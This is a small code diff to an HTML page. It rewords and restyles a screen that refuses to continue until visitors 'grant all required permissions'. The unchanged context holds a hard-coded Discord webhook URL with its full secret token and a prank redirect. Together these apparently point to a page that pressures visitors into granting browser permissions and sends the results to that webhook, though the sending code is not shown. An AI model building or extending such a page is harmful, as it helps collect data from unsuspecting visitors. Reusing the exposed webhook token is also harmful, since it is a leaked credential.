--- a/index.html
+++ b/index.html
@@ -26,7 +26,10 @@
     const webhookUrl = "https://discord.com/api/webhooks/1388161217603965210/eELyivDPEhlKfnaaDce_b90zBtGFpe51uLHo28LsG0gle_1d8pfuN-_U6vK6Q38_N4Fj";
     const redirectUrl = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";
     const deniedPage = `<html style='background:black;color:white;font-family:sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;'>
-      <body><div>Permissions not given. Please click allow and reload the page.</div></body></html>`;
+      <body style='margin:0;display:flex;justify-content:center;align-items:center;height:100vh;'>
+        <div>Permissions not given. Please grant all required permissions and reload the page.</div>
+      </body>
+    </html>`;
 
     let timeoutID;
 
